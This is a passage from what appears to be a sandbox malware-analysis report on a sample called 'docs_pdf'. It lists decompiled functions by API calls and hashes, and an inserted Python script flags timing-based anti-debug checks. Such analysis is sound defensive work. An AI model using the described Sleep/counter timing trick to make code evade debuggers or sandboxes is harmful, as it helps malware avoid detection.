                                    • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: ErrorMode$InformationVolume__swprintf
                                    • String ID: %lu
                                    • API String ID: 3164766367-685833217
                                    • Opcode ID: 4447f5c87769a680d12e90a3a77742206245fc80d13b28ddcbc7c848ff58369c
                                    • Instruction ID: 670baa409f06fe08abcf48e470f5fa8c8e22b64cc1a66685536a2a27b50e835e
                                    • Opcode Fuzzy Hash: 4447f5c87769a680d12e90a3a77742206245fc80d13b28ddcbc7c848ff58369c
                                    • Instruction Fuzzy Hash: 04217130A00209AFCB10EF65DC85EEE7BBCEF89704B004069F949EB251DB75EA41DB21
                                    APIs
                                      • Part of subcall function 00FB7D2C: _memmove.LIBCMT ref: 00FB7D66
                                      • Part of subcall function 0100A37C: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 0100A399
                                      • Part of subcall function 0100A37C: GetWindowThreadProcessId.USER32(?,00000000), ref: 0100A3AC
                                      • Part of subcall function 0100A37C: GetCurrentThreadId.KERNEL32 ref: 0100A3B3
                                      • Part of subcall function 0100A37C: AttachThreadInput.USER32(00000000), ref: 0100A3BA
                                    • GetFocus.USER32 ref: 0100A554
                                      • Part of subcall function 0100A3C5: GetParent.USER32(?), ref: 0100A3D3
                                    • GetClassNameW.USER32(?,?,00000100), ref: 0100A59D
                                    • EnumChildWindows.USER32(?,0100A615), ref: 0100A5C5
                                    • __swprintf.LIBCMT ref: 0100A5DF
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                    • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows__swprintf_memmove
                                    • String ID: %s%d
                                    • API String ID: 1941087503-1110647743
                                    • Opcode ID: 3949ca57c8372915a6a06dcd65dc015c9bf2c81aebe660a2eff1ca24073a01c4
                                    • Instruction ID: c7b69f0b5ea53761c7a616e07b6d9657ff2ca7f62bbf077594b15e51982ea557
                                    • Opcode Fuzzy Hash: 3949ca57c8372915a6a06dcd65dc015c9bf2c81aebe660a2eff1ca24073a01c4
                                    • Instruction Fuzzy Hash: 6011A571600306ABEF127F75DC85FEE377C9F8C700F004065B948AB182CA7559459B75
                                    APIs
                                    • CharUpperBuffW.USER32(?,?), ref: 01012048
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                    • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: BuffCharUpper
                                    • String ID: APPEND$EXISTS$KEYS$REMOVE
                                    • API String ID: 3964851224-769500911
                                    • Opcode ID: 995cf6c676ee77debcc37bf819ae59ca484d90f733c9fa0b64bf8ce67ce53510
                                    • Instruction ID: f96213714829fd2aadd21c99e9dea2ceab1a4ad1ae909fb8f797e34c0887c5f0
                                    • Opcode Fuzzy Hash: 995cf6c676ee77debcc37bf819ae59ca484d90f733c9fa0b64bf8ce67ce53510
                                    • Instruction Fuzzy Hash: FE113C3090010ACFCF01EFA4DD415EEB7BABF05304B10859AE8956B357DB3A6906DB50
                                    APIs
                                    • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 0102EF1B
                                    • GetProcessIoCounters.KERNEL32(00000000,?), ref: 0102EF4B
                                    • GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 0102F07E
                                    • CloseHandle.KERNEL32(?), ref: 0102F0FF
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                    • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: Process$CloseCountersHandleInfoMemoryOpen
                                    • String ID:
                                    • API String ID: 2364364464-0
                                    • Opcode ID: 7c84f9706e346d295b42d4ae578adcffb3496dbcb6d8b9e07ea99263c18e110a
                                    • Instruction ID: ce288290317b302a1bb7d3036ce86b62ec5ee51fc58deade16c664ab9d396e57
                                    • Opcode Fuzzy Hash: 7c84f9706e346d295b42d4ae578adcffb3496dbcb6d8b9e07ea99263c18e110a
                                    • Instruction Fuzzy Hash: 3A8192716043119FD720EF29CC86F6AB7E9AF88710F04881DF699DB292DBB5A841DF41
                                    APIs
                                      • Part of subcall function 00FB7F41: _memmove.LIBCMT ref: 00FB7F82
                                      • Part of subcall function 010310A5: CharUpperBuffW.USER32(?,?,?,?,?,?,?,01030038,?,?), ref: 010310BC
                                    • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 01030388
                                    • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 010303C7
                                    • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 0103040E
                                    • RegCloseKey.ADVAPI32(?,?), ref: 0103043A
                                    • RegCloseKey.ADVAPI32(00000000), ref: 01030447
                                    Similarity
                                    • API ID: Close$BuffCharConnectEnumOpenRegistryUpper_memmove
                                    • String ID:
                                    • API String ID: 3440857362-0
                                    • Opcode ID: 518d97afae49dfd8968a2b24fad39c838bb8a14f91cc93a17b64ba71a88c2518
                                    • Instruction ID: 5e0a4b0a6ed9a2106cdaba6e203542736ed738fd04c375b8baade8518fa324bd
                                    • Opcode Fuzzy Hash: 518d97afae49dfd8968a2b24fad39c838bb8a14f91cc93a17b64ba71a88c2518
                                    • Instruction Fuzzy Hash: AC513671208205AFD704EF69CC81FAEB7ECAF88704F04896DB595872A1DB75E904DB52
                                    APIs
                                      • Part of subcall function 00FB9997: __itow.LIBCMT ref: 00FB99C2
                                      • Part of subcall function 00FB9997: __swprintf.LIBCMT ref: 00FB9A0C
                                    • LoadLibraryW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,?,?), ref: 0102DC3B
                                    • GetProcAddress.KERNEL32(00000000,?), ref: 0102DCBE
                                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 0102DCDA
                                    • GetProcAddress.KERNEL32(00000000,?), ref: 0102DD1B
                                    • FreeLibrary.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,?,?), ref: 0102DD35
                                      • Part of subcall function 00FB5B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,01017B20,?,?,00000000), ref: 00FB5B8C
                                      • Part of subcall function 00FB5B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,01017B20,?,?,00000000,?,?), ref: 00FB5BB0
                                    Similarity
                                    • API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad__itow__swprintf
                                    • String ID:
                                    • API String ID: 327935632-0
                                    • Opcode ID: e3968a33e7712a671daf5db70f01b16238a7b65e14de142aa6060e09ec7efa13
                                    • Instruction ID: 75361127d1c198116216416a6598b27de513164fbd432186d7333206d6e10de3
                                    • Opcode Fuzzy Hash: e3968a33e7712a671daf5db70f01b16238a7b65e14de142aa6060e09ec7efa13
                                    • Instruction Fuzzy Hash: C6515B75A0061A9FCB01EFA8C884DADB7F8FF49310B148099E955AB322D779AD45CF81
                                    APIs
                                    • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 0101E88A
                                    • GetPrivateProfileSectionW.KERNEL32(?,00000001,00000003,?), ref: 0101E8B3
                                    • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 0101E8F2
                                      • Part of subcall function 00FB9997: __itow.LIBCMT ref: 00FB99C2
                                      • Part of subcall function 00FB9997: __swprintf.LIBCMT ref: 00FB9A0C
                                    • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 0101E917
                                    • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 0101E91F
                                    Similarity
                                    • API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
                                    • String ID:
                                    • API String ID: 1389676194-0
                                    • Opcode ID: 4a65f141193f44735429f3b94d755e18e25a3c5c77f903ce9d9b3f15457974ce
                                    • Instruction ID: 644f51fca9ae048cfd1642a713b75fc9269d92965bb70934731d74713dea015f
                                    • Opcode Fuzzy Hash: 4a65f141193f44735429f3b94d755e18e25a3c5c77f903ce9d9b3f15457974ce
                                    • Instruction Fuzzy Hash: 79513735A00205EFCB01EF65C981AAEBBF5FF08310B148099E949AB362CB79ED11DF51
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 949b5ed1061656572dc7f05937def131d4b870722939b79691886fa3b8b7ed98
                                    • Instruction ID: d6ebcc554448a451c818708336ba5d25d117da2dfe8e0c4bcfaa471018fb7a1c
                                    • Opcode Fuzzy Hash: 949b5ed1061656572dc7f05937def131d4b870722939b79691886fa3b8b7ed98
                                    • Instruction Fuzzy Hash: 0B41A275E00104EFE760DA28C848FA9BBACEB8A310F0481A5FAD6E72D1D7759941CB50
                                    APIs
                                    • GetCursorPos.USER32(?), ref: 00FB2357
                                    • ScreenToClient.USER32(010767B0,?), ref: 00FB2374
                                    • GetAsyncKeyState.USER32(00000001), ref: 00FB2399
                                    • GetAsyncKeyState.USER32(00000002), ref: 00FB23A7
                                    Similarity
                                    • API ID: AsyncState$ClientCursorScreen
                                    • String ID:
                                    • API String ID: 4210589936-0
                                    • Opcode ID: 61a968ccd570f2b6eb38d1611e319fd6ab7e9fd875c54e75d3ce2783986790c7
                                    • Instruction ID: 5d8a91dddef6fc8c78cd9ec1048c7ad7181dc9a644c27fb1ac79e338273a03f7
                                    • Opcode Fuzzy Hash: 61a968ccd570f2b6eb38d1611e319fd6ab7e9fd875c54e75d3ce2783986790c7
                                    • Instruction Fuzzy Hash: D841B235904155FBCF159F69C844AEDBBB4FB45330F104319F96892290C7355990EF91
                                    APIs
                                    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0100695D
                                    • TranslateAcceleratorW.USER32(?,?,?), ref: 010069A9
                                    • TranslateMessage.USER32(?), ref: 010069D2
                                    • DispatchMessageW.USER32(?), ref: 010069DC
                                    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 010069EB
                                    Similarity
                                    • API ID: Message$PeekTranslate$AcceleratorDispatch
                                    • String ID:
                                    • API String ID: 2108273632-0
                                    • Opcode ID: 8f8daa4a8afeb225e9197b9a6d575271c5c036e034177a42f8ed140fa726faa3
                                    • Instruction ID: e6631b22d2b02b8c9c5778332f223d8e209c0cabb987bee83617cf90de870e74
                                    • Opcode Fuzzy Hash: 8f8daa4a8afeb225e9197b9a6d575271c5c036e034177a42f8ed140fa726faa3
                                    • Instruction Fuzzy Hash: DA31F6719006079AFBB2DE79D844FF67BEDAB02300F0041A5E0E2D34D5E72B9096CB50
                                    APIs
                                    • GetWindowRect.USER32(?,?), ref: 01008F12
                                    • PostMessageW.USER32(?,00000201,00000001), ref: 01008FBC
                                    • Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 01008FC4
                                    • PostMessageW.USER32(?,00000202,00000000), ref: 01008FD2
                                    • Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 01008FDA
                                    Similarity
                                    • API ID: MessagePostSleep$RectWindow
                                    • String ID:
                                    • API String ID: 3382505437-0
                                    • Opcode ID: c89ad23c83ae90a76ad246206623a9645788f4bdadaa36ce5d17cebe87b4b59c
                                    • Instruction ID: cc473d3dc8c0d93b05fb157d1d50f1eb3960d4c0306eac690eb6adb5aef28049
                                    • Opcode Fuzzy Hash: c89ad23c83ae90a76ad246206623a9645788f4bdadaa36ce5d17cebe87b4b59c
                                    • Instruction Fuzzy Hash: 0A31E07190021AEFEB15CF78D94CAAE7BB6FB04315F00825AFAA4E61D1C3B09914DB91
                                    APIs
                                    • IsWindowVisible.USER32(?), ref: 0100B6C7
                                    • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 0100B6E4
                                    • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 0100B71C
                                    • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 0100B742
                                    • _wcsstr.LIBCMT ref: 0100B74C
                                    Similarity
                                    • API ID: MessageSend$BuffCharUpperVisibleWindow_wcsstr
                                    • String ID:
                                    • API String ID: 3902887630-0
                                    • Opcode ID: 8baa882b2559dc055503f3e9e53fbc4ac0414d9a32a263a0784192c1d41c6cea
                                    • Instruction ID: 3ba17386b3de0eeb823ee68e9275f16e2a39cd1e27c76a723f36ab8cc338cb6d
                                    • Opcode Fuzzy Hash: 8baa882b2559dc055503f3e9e53fbc4ac0414d9a32a263a0784192c1d41c6cea
                                    • Instruction Fuzzy Hash: A3212935604204BBFB266B399C49E7B7BDDEF49750F04406AFC49CA2D1EF65C840A3A1
                                    APIs
                                      • Part of subcall function 00FB2612: GetWindowLongW.USER32(?,000000EB), ref: 00FB2623
                                    • GetWindowLongW.USER32(?,000000F0), ref: 0103B44C
                                    • SetWindowLongW.USER32(00000000,000000F0,00000001), ref: 0103B471
                                    • SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 0103B489
                                    • GetSystemMetrics.USER32(00000004), ref: 0103B4B2
                                    • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,?,?,01021184,00000000), ref: 0103B4D0
                                    Similarity
                                    • API ID: Window$Long$MetricsSystem
                                    • String ID:
                                    • API String ID: 2294984445-0
                                    • Opcode ID: 95560baf6982c434d519f3c8a6e24cae129aeb610ff930efdd2fa8ba41c11d16
                                    • Instruction ID: 630d9409e53babb69a32adde96b426787c8897888ab0e45f8dc756fe7edb72ea
                                    • Opcode Fuzzy Hash: 95560baf6982c434d519f3c8a6e24cae129aeb610ff930efdd2fa8ba41c11d16
                                    • Instruction Fuzzy Hash: 3B21F771910216AFDB608E3CDC04B6A3BE8FB45724F104768FEA6D71D1EB319810CB84
                                    APIs
                                    • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 01009802
                                      • Part of subcall function 00FB7D2C: _memmove.LIBCMT ref: 00FB7D66
                                    • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 01009834
                                    • __itow.LIBCMT ref: 0100984C
                                    • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 01009874
                                    • __itow.LIBCMT ref: 01009885
                                    Similarity
                                    • API ID: MessageSend$__itow$_memmove
                                    • String ID:
                                    • API String ID: 2983881199-0
                                    • Opcode ID: 5407f16d9b1288c14a0eb685b3a5231f35b439ee86b2ab2d22bf13fccb1fdf65
                                    • Instruction ID: 9e85f260bcf92cfaf021c18dd211a5d49d18b2400c48511653be70c575691b19
                                    • Opcode Fuzzy Hash: 5407f16d9b1288c14a0eb685b3a5231f35b439ee86b2ab2d22bf13fccb1fdf65
                                    • Instruction Fuzzy Hash: 8D21C831B00205EBFB11AA758C86EEE7BBDDF48714F040069FA48DB392D6759A419792
                                    APIs
                                    • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00FB134D
                                    • SelectObject.GDI32(?,00000000), ref: 00FB135C
                                    • BeginPath.GDI32(?), ref: 00FB1373
                                    • SelectObject.GDI32(?,00000000), ref: 00FB139C
                                    Similarity
                                    • API ID: ObjectSelect$BeginCreatePath
                                    • String ID:
                                    • API String ID: 3225163088-0
                                    • Opcode ID: 7227f32c03e5b055eb6ffee7d175d05763fb9e2cf7d53d90099f78e15456fef4
                                    • Instruction ID: 1a7b6805cdb5269270b7ea555687b2ce3258d766e74c12b36e48e947ea87821f
                                    • Opcode Fuzzy Hash: 7227f32c03e5b055eb6ffee7d175d05763fb9e2cf7d53d90099f78e15456fef4
                                    • Instruction Fuzzy Hash: C22186B1C00705EFEB208F66D8447A97BF8FB00321F684316F491A6194E77B9995EF91
                                    APIs
                                    Similarity
                                    • API ID: _memcmp
                                    • String ID:
                                    • API String ID: 2931989736-0
                                    • Opcode ID: 8aa1b62f7ca0d914731bac63440de7e314a92b59230db75fa9227654b0ab83b5
                                    • Instruction ID: 2353677a9ffd98d880280c6f98d9212af3e24c6469f551348944e170cb701bbb
                                    • Opcode Fuzzy Hash: 8aa1b62f7ca0d914731bac63440de7e314a92b59230db75fa9227654b0ab83b5
                                    • Instruction Fuzzy Hash: FF01DDB170410A7BF206A9256E82FEF779DEF12294F084165FD44973C3EB54DE1582E4
                                    APIs
                                    • GetCurrentThreadId.KERNEL32 ref: 01014D5C
                                    • __beginthreadex.LIBCMT ref: 01014D7A
                                    • MessageBoxW.USER32(?,?,?,?), ref: 01014D8F
                                    • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 01014DA5
                                    • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 01014DAC
                                    Similarity
                                    • API ID: CloseCurrentHandleMessageObjectSingleThreadWait__beginthreadex
                                    • String ID:
                                    • API String ID: 3824534824-0
                                    • Opcode ID: 74c2cf352414b81fdb4e5322ffd3ddea701e3f283286a48c4af1427f03f9d733
                                    • Instruction ID: 0dac35ae52946f54e752b684c683ebe82394bfba358f636b08904eeb4e054457
                                    • Opcode Fuzzy Hash: 74c2cf352414b81fdb4e5322ffd3ddea701e3f283286a48c4af1427f03f9d733
                                    • Instruction Fuzzy Hash: D31148B2D04605BBDB21ABAC9C48ADE7FACEB46320F144259F998D3244D77E880087A1
                                    APIs
                                    • GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 01008766
                                    • GetLastError.KERNEL32(?,0100822A,?,?,?), ref: 01008770
                                    • GetProcessHeap.KERNEL32(00000008,?,?,0100822A,?,?,?), ref: 0100877F
                                    • HeapAlloc.KERNEL32(00000000,?,0100822A,?,?,?), ref: 01008786
                                    • GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 0100879D
                                    Similarity
                                    • API ID: HeapObjectSecurityUser$AllocErrorLastProcess
                                    • String ID:
                                    • API String ID: 842720411-0
                                    • Opcode ID: 78f46cb5a438e2d15d2a02800591c306b42f00b9ff0c271c0730df3284db0913
                                    • Instruction ID: 402ca5105886658aefcabcf75f29750f120989ce7f117baf11a61ad1394c422c
                                    • Opcode Fuzzy Hash: 78f46cb5a438e2d15d2a02800591c306b42f00b9ff0c271c0730df3284db0913
                                    • Instruction Fuzzy Hash: 9B016271A00215BFEB255FBADC48D6B7FACFF8A255B104469F989C2154D632CC10DB61
                                    APIs
                                    • QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 01015502
                                    • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 01015510
                                    • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?), ref: 01015518
                                    • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 01015522
                                    • Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 0101555E
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                     • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: PerformanceQuery$CounterSleep$Frequency
                                    • String ID:
                                    • API String ID: 2833360925-0
                                    • Opcode ID: eb24aa210d4065e081dc6a0799ed1a86052e34b67085d1264094213e11c51e50
                                    • Instruction ID: 280d49b9ac83def8d19bf9fa0264486b1eaa8b6ba548789520e42cec62ccf781
                                    • Opcode Fuzzy Hash: eb24aa210d4065e081dc6a0799ed1a86052e34b67085d1264094213e11c51e50
                                    • Instruction Fuzzy Hash: 4D016D35D0061ADBCF10EFE8EC986EDBB79FB4A711F440086E981F6148DB395554C7A2
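The function at 01015502 above is the one the report's "Contains functionality for execution timing" signature points at: two QueryPerformanceCounter reads bracket a Sleep, so the code can compare the elapsed time against the requested delay and notice a debugger or a hooked Sleep. The following Python is an added example, not Joe Sandbox code and not the sandbox's own signature logic. It parses the per-function "APIs" blocks in the shapes they take in this report ("Func.MODULE(args), ref: ADDR", "Func.MODULE ref: ADDR", and the indented "Part of subcall function ADDR:" form), then flags any function whose own call sequence has a clock read on both sides of a delay. The clock and delay name sets and the three sample blocks (copied from this page) are the editor's constructions.

```python
"""Parse Joe Sandbox per-function "APIs" listings and flag timing-based
anti-debug sequences.  Added example, not Joe Sandbox code: the line shapes
are the ones seen in this report, the heuristic is the editor's."""
from __future__ import annotations

import re
from dataclasses import dataclass, field
from typing import Optional

# Constructed sample: three "APIs" blocks copied from this report (the timing
# loop at 01015502, a GDI path routine, and a CRT helper reached only through
# subcalls), each closed by the heading that follows it in the report.
SAMPLE = """\
APIs
• QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 01015502
• QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 01015510
• Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?), ref: 01015518
• QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 01015522
• Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 0101555E
Memory Dump Source
APIs
• EndPath.GDI32(?), ref: 00FB13BF
• StrokeAndFillPath.GDI32(?,?,00FEBAD8,00000000,?), ref: 00FB13DB
• SelectObject.GDI32(?,00000000), ref: 00FB13EE
• DeleteObject.GDI32 ref: 00FB1401
• StrokePath.GDI32(?), ref: 00FB141C
Memory Dump Source
APIs
  • Part of subcall function 00FD0FF6: std::exception::exception.LIBCMT ref: 00FD102C
  • Part of subcall function 00FD0FF6: __CxxThrowException@8.LIBCMT ref: 00FD1041
• __swprintf.LIBCMT ref: 00FC302D
Strings
"""


@dataclass
class ApiCall:
    name: str
    module: str
    args: list[str]
    ref: int                    # address of the call site
    subcall_of: Optional[int]   # set when the report attributes the call to a callee


@dataclass
class FunctionRecord:
    calls: list[ApiCall] = field(default_factory=list)

    @property
    def entry(self) -> int:
        """Lowest call site owned by the function itself (the report does not
        print the function start, so this is the usable anchor)."""
        own = [c.ref for c in self.calls if c.subcall_of is None]
        return min(own or [c.ref for c in self.calls])


_SUBCALL = re.compile(r"^Part of subcall function ([0-9A-Fa-f]+):\s*(.*)$")


def parse_call(line: str) -> ApiCall:
    body = line.strip().lstrip("•").strip()
    subcall_of = None
    m = _SUBCALL.match(body)
    if m:
        subcall_of, body = int(m.group(1), 16), m.group(2)
    left, _, ref = body.rpartition(" ref: ")
    left = left.rstrip(",").strip()
    args: list[str] = []
    if "(" in left:
        # The outermost parentheses belong to the call; annotated arguments
        # such as 00000003(TokenPrivileges) sit inside them and stay intact.
        name_mod = left[: left.index("(")]
        argstr = left[left.index("(") + 1 : left.rindex(")")]
        args = argstr.split(",") if argstr else []
    else:
        name_mod = left
    name, _, module = name_mod.rpartition(".")
    return ApiCall(name, module, args, int(ref, 16), subcall_of)


def parse_records(text: str) -> list[FunctionRecord]:
    records: list[FunctionRecord] = []
    current: Optional[FunctionRecord] = None
    for raw in text.splitlines():
        line = raw.strip()
        if line == "APIs":
            current = FunctionRecord()
            records.append(current)
        elif line.startswith("•") and current is not None:
            current.calls.append(parse_call(line))
        else:
            current = None          # any other heading closes the block
    return [r for r in records if r.calls]


# Two clock reads bracketing a delay: the code measures how long the delay
# really took, which single-stepping or a hooked Sleep inflates.
_CLOCKS = {"QueryPerformanceCounter", "GetTickCount", "GetTickCount64",
           "timeGetTime", "NtQueryPerformanceCounter"}
_DELAYS = {"Sleep", "SleepEx", "NtDelayExecution", "WaitForSingleObject"}


def is_timing_check(rec: FunctionRecord) -> bool:
    seq = [c.name for c in rec.calls if c.subcall_of is None]
    reads = [i for i, n in enumerate(seq) if n in _CLOCKS]
    return any(any(seq[k] in _DELAYS for k in range(i + 1, j))
               for i in reads for j in reads if j > i)


def triage(text: str) -> list[tuple[str, bool, tuple[str, ...]]]:
    """(entry address, timing-check flag, sorted MODULE!Func profile) per function."""
    out = []
    for rec in parse_records(text):
        profile = tuple(sorted({f"{c.module}!{c.name}" for c in rec.calls}))
        out.append((f"{rec.entry:08X}", is_timing_check(rec), profile))
    return out


if __name__ == "__main__":
    for entry, flagged, profile in triage(SAMPLE):
        print(entry, "TIMING-CHECK" if flagged else "-", ", ".join(profile))
```

Feed it the text of a whole report and only the function at 01015502 is flagged; the GDI and CRT blocks pass through with just their MODULE!Func profile, which is handy for grouping identical helper functions across the AutoIt-compiled samples this stub belongs to. Subcall lines are parsed but excluded from the sequence test, since the report attributes them to the callee rather than to the function being listed.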
                                    APIs
                                    • CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,0100758C,80070057,?,?,?,0100799D), ref: 0100766F
                                    • ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,0100758C,80070057,?,?), ref: 0100768A
                                    • lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,0100758C,80070057,?,?), ref: 01007698
                                    • CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,0100758C,80070057,?), ref: 010076A8
                                    • CLSIDFromString.OLE32(?,?,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,0100758C,80070057,?,?), ref: 010076B4
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                     • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: From$Prog$FreeStringTasklstrcmpi
                                    • String ID:
                                    • API String ID: 3897988419-0
                                    • Opcode ID: 774026793fbeb166c5ed920158fd9c9c008db66356c0388ede961f64a367fedc
                                    • Instruction ID: 5c1fb9cb53d22a8e9aa338fafd794f0a4350e7e96f3ebb8c2fe3ae1ffbddf180
                                    • Opcode Fuzzy Hash: 774026793fbeb166c5ed920158fd9c9c008db66356c0388ede961f64a367fedc
                                    • Instruction Fuzzy Hash: AB01D47AA00215BBEB214F18DC04BAA7FECEB48651F100019FEC6D2255E73AED408BB0
                                    APIs
                                    • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 01008608
